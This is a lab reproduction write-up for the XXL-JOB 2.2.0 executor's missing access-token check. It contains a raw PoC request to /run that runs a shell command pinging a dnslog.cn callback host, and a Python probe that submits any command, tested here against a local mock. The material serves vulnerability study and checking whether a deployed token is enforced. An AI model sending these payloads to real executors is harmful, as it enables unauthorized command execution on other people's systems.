# XXL-JOB executor unauthorized access vulnerability

XXL-JOB is a distributed task scheduling platform whose stated design goals are fast development, easy learning, light weight and easy extension. It is open source and is used in the production lines of a number of companies. XXL-JOB has two components: the admin, which is the management web console, and the executor, which is the client that actually runs the jobs. The executor ships with no authentication configured, so an unauthenticated attacker who can reach the executor port can execute arbitrary commands through its RESTful API.
## Environment setup

Run the following command to start XXL-JOB version 2.2.0:

```bash
docker-compose up -d
```

Once the environment is up, `http://your-ip:8080` serves the admin console and `http://your-ip:9999` serves the executor.
## Vulnerability reproduction

PoC request. Note that it goes to the executor port (9999), not to the admin console; `glueType` is `GLUE_SHELL` and `glueSource` is the shell script the executor will write to disk and run:

```http
POST /run HTTP/1.1
Host: 10.0.128.46:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 368

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "ping 0r4t1y.dnslog.cn",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}
```

The request succeeds and the executor runs the shell script. The executor only checks the `XXL-JOB-ACCESS-TOKEN` request header when an `accessToken` has been configured on it (with the same value on the admin side); with no token set, any client that can reach the executor port can submit a job.
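As an added example (not part of the original write-up and not XXL-JOB's own code), the Python script below sends the same TriggerParam JSON to `/run`, reads the executor's ReturnT answer and reports whether the job was accepted, optionally supplying an access token. It also contains a small mock executor, written here as an assumption about the executor's behaviour (token check on the `XXL-JOB-ACCESS-TOKEN` header, failure reported in the JSON `code` field under an HTTP 200), so the probe can be exercised offline; the loopback address, the token value `s3cret` and the `id` command are constructed test inputs.

```python
"""Probe an XXL-JOB executor for the missing access-token check.

Sends the same TriggerParam JSON as the request above to POST /run and
reads the executor's ReturnT answer. An executor with no accessToken
configured answers code 200 and runs the GLUE_SHELL script; one with a
token configured rejects a request whose XXL-JOB-ACCESS-TOKEN header does
not match. The mock executor below is an assumption of that behaviour so
the probe can be tested without a real target.
"""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ACCESS_TOKEN_HEADER = "XXL-JOB-ACCESS-TOKEN"


def build_trigger_payload(job_id, glue_source, handler="demoJobHandler"):
    """TriggerParam body for /run, using the field names from the request above."""
    return {
        "jobId": job_id,
        "executorHandler": handler,
        "executorParams": "",
        "executorBlockStrategy": "COVER_EARLY",
        "executorTimeout": 0,
        "logId": job_id,
        "logDateTime": 1586629003729,
        "glueType": "GLUE_SHELL",
        "glueSource": glue_source,
        "glueUpdatetime": 1586699003758,
        "broadcastIndex": 0,
        "broadcastTotal": 0,
    }


def probe_executor(base_url, glue_source="id", access_token=None, timeout=5):
    """POST /run and return the parsed ReturnT body as a dict.

    glue_source defaults to the harmless `id`; an unauthenticated executor
    WILL run it, so only point this at hosts you are allowed to test.
    """
    data = json.dumps(build_trigger_payload(1, glue_source)).encode("utf-8")
    headers = {"Content-Type": "application/json"}
    if access_token is not None:
        headers[ACCESS_TOKEN_HEADER] = access_token
    req = urllib.request.Request(base_url.rstrip("/") + "/run", data=data,
                                 headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def is_unauthenticated(return_t):
    """True when the executor accepted the job (ReturnT code 200)."""
    return return_t.get("code") == 200


class _MockExecutorHandler(BaseHTTPRequestHandler):
    """Assumed stand-in for the executor's /run: checks the token, never runs glueSource."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = json.loads(self.rfile.read(length) or b"{}")
        token = self.server.configured_token
        if token and self.headers.get(ACCESS_TOKEN_HEADER) != token:
            answer = {"code": 500, "msg": "The access token is wrong."}
        elif self.path != "/run":
            answer = {"code": 500, "msg": "invalid request, uri-mapping(%s) not found." % self.path}
        else:
            # A real executor would write glueSource to a script and run it here.
            self.server.received.append(body.get("glueSource"))
            answer = {"code": 200, "msg": None}
        out = json.dumps(answer).encode("utf-8")
        self.send_response(200)  # assumed: failure is signalled in the body, not the HTTP status
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(out)))
        self.end_headers()
        self.wfile.write(out)

    def log_message(self, *args):
        pass  # keep the mock quiet


def start_mock_executor(configured_token=None):
    """Start the mock on 127.0.0.1 with an ephemeral port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), _MockExecutorHandler)
    server.configured_token = configured_token
    server.received = []  # glueSource values the mock would have executed
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


if __name__ == "__main__":
    srv, url = start_mock_executor()
    print("no token configured, job accepted:", is_unauthenticated(probe_executor(url)))
    srv.shutdown()
    srv, url = start_mock_executor("s3cret")
    print("token configured, none sent:", is_unauthenticated(probe_executor(url)))
    print("token configured, correct token sent:",
          is_unauthenticated(probe_executor(url, access_token="s3cret")))
    srv.shutdown()
```

Against a live executor, call `probe_executor("http://your-ip:9999")` and treat a `code` of 200 as confirmation that the job was accepted without credentials; the same call with `access_token` set lets you verify that a deployed token is actually being enforced.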